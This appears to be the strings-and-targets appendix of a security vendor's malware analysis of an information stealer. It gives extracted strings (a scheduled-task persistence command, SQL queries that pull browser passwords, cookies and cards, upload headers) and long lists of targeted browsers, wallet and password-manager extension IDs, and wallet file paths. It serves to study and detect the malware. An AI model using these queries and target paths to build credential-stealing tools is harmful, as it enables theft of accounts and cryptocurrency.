 * ,+& ##*
 * -t{d2
 * ..*($2nd-2d-2o595
 * ..\\stealer\\chromiumbrowsers.cpp
 * ..\\stealer\\filesgrabber.cpp
 * ..\\stealer\\geckobrowsers.cpp
 * ..\\stealer\\httpclient.cpp
 * ..\\stealer\\loader.cpp
 * ..\\stealer\\sqlite3.cpp
 * ..\\stealer\\stealer.cpp
 * /c schtasks /create /F /sc minute /mo 15 /tr \"%ls\" /tn
   \"\\WindowsAppPool\\%ls\"
 * LeaveCriticalSection
 * EnterCriticalSection
 * Advapi32.dll
 * Autofills/%ls_%ls.txt
 * Available KeyboardLayouts: Gonna gather system information
 * Build mark: 
 * CPU: 
 * Can't add task in task scheduleO, COeatePOocessW fails; last eOOoO: %x
 * Can't obtain RmStartSession's address, maybe windows don't support
   RestartManager
 * Can't start process; last error: %x
 * Can't write file; last error: %x
 * Card: 
 * Chromium browsers paths were retrieved
 * ComSpec
 * Command line: %ls
 * ComputerName: 
 * Config retrieved: %d, %d, %d, %d, %d, %d, %d, %d, %d, %d
 * Content-Disposition: form-data; name=\"%s\"
 * Content-Length: %d
 * Content-Type: multipart/form-data; boundary=%s
 * Cookies
 * Cookies/%ls_%ls.txt
 * Country: {country}
 * CreditCards/%ls_%ls.txt
 * Current language: 
 * Default
 * Email
 * Email/Credentials.txt
 * Email: 
 * EnterCriticalSection
 * Expand path: %ls
 * Extensions were retrieved
 * FALSE
 * Failed to connect to %s
 * Failed to download sqlite3.dll
 * Failed to export functions from sqlite3.dll
 * Failed to load sqlite3.dll
 * Failed to retrieve chromium browsers paths
 * Failed to retrieve files grabber paths
 * Failed to retrieve gecko browsers paths
 * File Location: 
 * Files grabber paths were retrieved
 * FilesGrabber: Sent %ls
 * Find chromium cookies db %ls
 * Find chromium extension %ls with id %ls
 * Find chromium history db %ls
 * Find chromium login data db %ls
 * Find chromium web data db %ls
 * Find gecko autofills db %ls
 * Find gecko cookies db %ls
 * Find gecko file %ls
 * Find gecko history db %ls
 * Find steam data, path %ls
 * Gdi32.dll
 * Gecko browsers were retrieved
 * Gecko/%ls/%ls/%ls
 * GetModuleHandleA
 * Global\\%s%x
 * Gonna gather system information
 * Gonna grab ChromiumBrowsers
 * Gonna grab GeckoBrowsers
 * Gonna grab files
 * Gonna grab outlook
 * Gonna grab steam
 * Gonna grab telegrab
 * Gonna take screenshot
 * GrabFiles
 * HH':'mm':'ss
 * HWID: 
 * HandleChromiumBrowsers
 * HandleGeckoBrowsers
 * Hardwares: 
 * History/%ls_%ls.txt
 * Holder: 
 * HttpOpenRequest fails; last error: %x
 * HttpQueryInfo fails; last error: %x
 * IMAP Password
 * IP: {ip}
 * InitializeCriticalSection
 * InternetConnect fails; last error: %x
 * InternetCrackUrl fails; last error: %x
 * InternetOpen fails; last error: %x
 * Kernel32.dll
 * Key: 
 * LeaveCriticalSection
 * Location: {location}
 * Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
 * Name: 
 * Network\\Cookies
 * Ntdll.dll
 * ..\\stealer\\geckobrowsers.cpp
 * Ole32.dll
 * Operation System: 
 * POP3 Password
 * Password: 
 * ProductName
 * Request
 * Retrieve rule FilesGrabber, server side path: %ls
 * Rstrtmgr.dll
 * Rstrtmgr.dllls GetModuleHandleA %sEnterCriticalSections. LeaveCriticalSection
 * SELECT expiration_month, expiration_year, name_on_card, card_number_encrypted
   FROM credit_cards
 * SELECT fieldname, value FROM moz_formhistory
 * SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
 * SELECT host_key, is_httponly, path, is_secure, expires_utc, name,
   encrypted_value FROM cookies
 * SELECT origin_url, username_value, password_value FROM logins
 * SELECT title, url FROM moz_places
 * SELECT url, title FROM urlsFind chromium history db %ls
 * SMTP Server
 * ScreenSize: 
 * Screenshot.jpeg
 * Sent log. Gonna send done message
 * Sent screenshot
 * Software\\Microsoft\\Office
 * Software\\Valve\\Steam
 * Sq~70
 * SrartLoader
 * Start
 * SteamPath
 * Successfully connected to %s
 * Successfully start process
 * SystemInformation.txt
 * Telegram
 * There's file to load. Gonna load it
 * TimeZone: {timezone}
 * Title: 
 * Tkernel32.dll
 * Token retrieved: %s
 * Trying to connect to %s
 * URL: 
 * USERPROFILE|tELEGRAMdESKTOP|TDATA
 * Url: 
 * User32.dll
 * UserName: 
 * Username: 
 * Value: 
 * Wallets/%ls_%ls_%ls
 * Wininet.dllCrypt32.dll
 * Wininet.dllCrypt32.dllGdiplus.dll
 * Wininet.dllCrypt32.dllGdiplus.dllShlwapi.dllKernel32.dll
 * Write file content in %ls
 * Zip code: {zipcode}
 * abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
 * build
 * cert8.db
 * cert9.db
 * chromium-browsers
 * computername
 * encrypted_key
 * extensions
 * filename
 * files
 * done
 * files
 * gecko-browsershi
 * Sent system information
 * kernel32.dll
 * key3.db
 * key4.db
 * loader
 * loghub/master
 * logins.json
 * msgtzn
 * SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion
 * signons.sqlite
 * sqlite3
 * sqlite3_close
 * sqlite3_column_blob
 * sqlite3_column_bytes
 * sqlite3_column_text
 * sqlite3_open
 * sqlite3_open_v2
 * sqlite3_open_v2sqlite3_finalize
 * sqlite3_prepare_v2
 * sqlite3_step
 * token
 * username
 * wallets\\


TARGETED CHROMIUM BROWSERS

 * Citrio|%localappdata%\CatalinaGroup\Citrio\User Data
 * Coowon|%localappdata%\Coowon\Coowon\User Data
 * Liebao|%localappdata%\liebao\User Data
 * QIP Surf|%localappdata%\QIP Surf\User Data
 * Orbitum|%localappdata%\Orbitum\User Data
 * Comodo Dragon|%localappdata%\Comodo\Dragon\User Data
 * Amigo|%localappdata%\Amigo\User\User Data
 * Torch|%localappdata%\Torch\User Data
 * Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data
 * Comodo|%localappdata%\Comodo\User Data
 * 360Browser|%localappdata%\360Browser\Browser\User Data
 * Maxthon3|%localappdata%\Maxthon3\User Data
 * K-Melon|%localappdata%\K-Melon\User Data
 * Sputnik|%localappdata%\Sputnik\Sputnik\User Data
 * Nichrome|%localappdata%\Nichrome\User Data
 * CocCoc|%localappdata%\CocCoc\Browser\User Data
 * Uran|%localappdata%\Uran\User Data
 * Chromodo|%localappdata%\Chromodo\User Data
 * Mail.Ru|%localappdata%\Mail.Ru\Atom\User Data
 * Brave Browser|%localappdata%\BraveSoftware\Brave-Browser\User Data
 * Opera|%appdata%\Opera Software\Opera Stable
 * Google Chrome|%localappdata%\Google\Chrome\User Data
 * Microsoft Edge|%localappdata%\Microsoft\Edge\User Data
 * Chromium|%localappdata%\Chromium\User Data
 * Opera|%localappdata%\Opera Software|ChromePlus
 * %localappdata%\MapleStudio\ChromePlus\User Data
 * Irpathium|%localappdata%\Irpathium\User Data
 * 7Star|%localappdata%\7Star\7Star\User Data
 * CentBrowser|%localappdata%\CentBrowser\User Data
 * Chedot|%localappdata%\Chedot\User Data
 * Vivaldi|%localappdata%\Vivaldi\User Data
 * Kometa|%localappdata%\Kometa\User Data
 * Elements Browser|%localappdata%\Elements Browser\User Data
 * Epic Privacy Browser|%localappdata%\Epic Privacy Browser\User Data
 * Uran|%localappdata%\uCozMedia\Uran\User Data
 * Sleipnir|%localappdata%\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer


TARGETED GECKO BROWSERS

 * Firefox|%appdata%\Mozilla\Firefox\Profiles
 * Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles
 * BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles
 * Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles
 * K-Meleon|%appdata%\K-Meleon\Profiles
 * Icecat|%appdata%\Mozilla\icecat\Profiles


TARGETED BROWSER EXTENSIONS

 * Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad
 * Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln
 * EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac
 * Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne
 * BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi
 * iWallet|kncchdigobghenbbaddojjnnaogfppfj
 * Wombat|amkmjjmmflddogmhpjloimipbofnfjih
 * MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm
 * GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj
 * Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig
 * Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec
 * NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao
 * CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk
 * Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn
 * Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp
 * Keplr|dmkamcknogkgcdfhhbddcghachkejeap
 * Sollet|fhmfendgdocmcbmfikdcogofphimnkno
 * Auro Wallet|cnmamaachppnkjgnildpdmkaakejnhae
 * Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf
 * ICONex|flpiciilemghbmfalicajoolhkkenfel
 * Nabox Wallet|nknhiehlklippafakaeklbeglecifhad
 * KHC|hcflpincpppdclinealmandijcmnkbgn
 * MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn
 * TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec
 * Binance Chain Wallet|fhbohimaelbohpjbbldcngcnapndodjp
 * Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb
 * Nifty Walletjbdaocneiiinmjbjlgalhcelgbejmnpath
 * Math Wallet|afbcbjpbpfadlkmhmclhkeeodmamcflc
 * Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc
 * TezBox|mnfifefkajgofkcjkempathiaecocnkjeh
 * DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik
 * BitClip|ijmpgkjfkbfhoebgogflfebnmejmfbml
 * Steem Keychain|lkcjlnjfpbikmcmbachjpdbijejflpcm
 * Nash Extension|onofpnbbkehpmmoabgpcpmigafmmnjhl
 * Hycon Lite Client|bcopgchhojmggmffilplmbdicgaihlkp
 * ZilPay|klnaejjgbibmhlephnhpmaofohgkpgkd
 * Coin98 Wallet|aeachknmefphepccionboohckonoeemg
 * Authenticator|bhghoamapcdpbohphigoooaddinpkbai
 * Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm
 * Byone|nlgbhdfgdhgbiamfdfmbikcdghpathoadd
 * OneKey|infeboajgfhgbjpjbeppbkgnabfdkdaf
 * LeafWallet|cihmoadaighcejopammfbmddcmdekcje
 * Authy|gaedmjdfmmahhbjefcbgaolhhanlaolb
 * EOS Authenticator|oeljdldpnmdbchonielpathgobddffflal
 * GAuth Authenticator|ilgcnhelpchnceeipipijaljkblbcobl
 * Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk
 * Ever|cgeeodpfagjceefieflmdfphplkenlfk
 * KardiaChain|pdadjkfkgcafgbceimcpbkalnfnepbnk
 * Rabby|acmacodkjbdgmoleebolmdjonilkdbch
 * Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa
 * Oxygen|fhilaheimglignddkjgofkcbgekhenbh
 * Pali|mgffkfbpathihjpoaomajlbgchddlicgpn
 * XDEFI|hmeobnfnfcmdkdcmlblgagmfpfboieaf
 * Nami|lpfcbjknijpeeillifnkikgncikgfhdo
 * MultiversX DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm
 * Keeper|lpilbniiabackdjcionkobglmddfbcjo
 * Softlare|bhhhlbepdkbapadjdnnojkbgioiodbic
 * Govy|jnkelfanjkeadonecabehalmbgpfodjm
 * SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmepath
 * Braavos|jnlgamecbpmbajjfhmmmlhejkemejdma
 * Enkrypt|kkpllkodjelopathieedojogacfhpaihoh
 * OKX|mcohilncbfahbmgdjkbpemcciiolgcge
 * HashPack|gjagmgpathdbbciopjhllkdnddhcglnemk
 * Eternl|kmhcihpebfmpgmihbkipmjlmmioameka
 * Pontem Aptos|phkbamefinggmakgklpkljjmgibohnba
 * Martianin|efbglgofoippbgcjepnhiblaibcnclgk
 * Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj
 * Leap Terra|aijcbedoijmgnlmjeegjaglmepbmpkpi
 * Dashlane|fdjamakpfbbddfjaooikfcpapjohcfmg
 * NordPass|fooolghllnmhmmndgjiamiiodkpenpbb
 * Roboform|pnlccmojcmeohlpggmfnbbiapkmbliob
 * LastPass|hdokiejnpimakedhajhdlcegeplioahd
 * BrowserPass|naepdomgkenhinolocfifgehpathddafch
 * MYKI|bmikpgodpkclnkgmnpphehdgcimmpathed


TARGETED CRYPTOCURRENCY WALLETS

 * Wallets/Jaxx
   Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0
 * Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0
 * Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0
 * Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0
 * Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1
 * Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1
 * Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0
 * Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0
 * Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0
 * Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0
 * Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1
 * Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0
 * Wallets/Ethereum|%appdata%\Ethereum|keystore|0
 * Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0
 * Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0
 * Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0
 * Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0
 * Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0






EXPLORE MORE ZSCALER BLOGS

Mystic Stealer
Read Post
Technical Analysis of HijackLoader
Read Post
CyberGate RAT and RedLine Stealer Delivered in Ongoing AutoIt Malware Campaigns
Read Post



GET THE LATEST ZSCALER BLOG UPDATES IN YOUR INBOX



By submitting the form, you are agreeing to our privacy policy.





THE ZSCALER EXPERIENCE

Learn about:

Your world, secured.Zero TrustSecurity Service Edge (SSE)Secure Access Service
Edge (SASE)Zero Trust Network Access (ZTNA)Secure Web Gateway (SWG)Cloud Access
Security Broker (CASB)Cloud Native Application Protection Platform (CNAPP)
PRODUCTS & SOLUTIONS
Secure Your Users

Secure Your Workloads

Secure Your IoT and OT

Secure Internet Access (ZIA)

Secure Private Access (ZPA)

Data Protection (CASB/DLP)

Digital Experience (ZDX)

Posture Control

Industry & Market Solutions

Partner Integrations

Zscaler Client Connector

PLATFORM
Zero Trust Exchange Platform

Secure Digital Transformation

Application Transformation

Network Transformation

Security Transformation

RESOURCES
Resource Library

Security Preview

Security & Risk Assessment

ThreatLabz Analytics & Insights

Upcoming Events

Blog

Zscaler Academy

CXO Revolutionaries

Zpedia

Ransomware Protection ROI Calculator

POPULAR LINKS
Pricing & Plans

About Zscaler

Leadership Team

Career Opportunities

Find or Become a Partner

Customer Success Center

Investor Relations

Press Center

News & Announcements

ESG

Compliance

Contact Zscaler

Home
English
EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues
- Brasil

Zscaler is universally recognized as the leader in zero trust. Leveraging the
largest security cloud on the planet, Zscaler anticipates, secures, and
simplifies the experience of doing business for the world's most established
companies.

English
EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - EspañaPortugues
- Brasil

Visit us on FacebookLinkedinFollow us on TwitterSubscribe our Youtube Channel
SitemapPrivacyLegalSecurity
© 2023 Zscaler, Inc.

All rights reserved. Zscaler™ and other trademarks listed at
zscaler.com/legal/trademarks are either (i) registered trademarks or service
marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States
and/or other countries. Any other trademarks are the properties of their
respective owners.



Zscaler uses cookies to personalize content and ads, to provide social media
features and to analyze our traffic. We also share information about your use of
our site with our social media, advertising and analytics partners.Please review
our Cookies Policy for more information.

Cookies Settings Accept Cookies